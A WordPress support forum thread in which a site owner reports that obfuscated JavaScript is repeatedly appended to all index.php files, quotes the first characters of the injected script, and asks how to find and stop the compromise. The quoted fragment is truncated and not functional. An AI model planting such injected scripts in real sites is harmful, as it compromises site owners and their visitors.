Finding the cause of a hack

  • Everyday something modifies all my index.php files by adding a long script like:

    <script>function vVbYtyVdttY(vbdaYxtbatt){ return(parseInt(vbdaYxtbatt,16));….and on and on.

    The scripts makes the feeds invalid. I replace the files with the originals from the WordPress distribution but within a day or two, there’s another script at the end of the files.

    How do I go about tracking this down? Or better yet stopping it?

  • The topic ‘Finding the cause of a hack’ is closed to new replies.